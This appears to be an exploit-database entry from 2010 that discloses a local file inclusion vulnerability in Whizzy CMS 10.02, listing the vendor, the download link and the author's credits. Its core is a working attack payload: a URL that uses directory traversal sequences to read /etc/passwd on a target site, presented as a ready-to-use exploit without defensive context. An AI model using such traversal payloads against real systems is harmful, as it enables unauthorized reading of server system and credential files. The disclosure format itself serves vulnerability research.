Whizzy CMS 10.02 Local File Inclusion

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Whizzy CMS 10.02 Local File Inclusion
# Published : 2010-07-29
# Author : Anarchy Angel
# Previous Title : Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability
# Next Title : Joomla Component PBBooking 1.0.4_3 Multiple Blind SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: www.unverse.net
[x] Script Name: Whizzy CMS
[x] Script Version: 10.02
[x] Script DL: http://code.google.com/p/whizzy/downloads/list
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/?[LFI]

Ex:
http://site.org/?../../../../../../../etc/passwd

This is a special DefCon 18 kick off from me! See ya there ;)

Special Tnx : lun0s, proge, sToRm, progenic, gny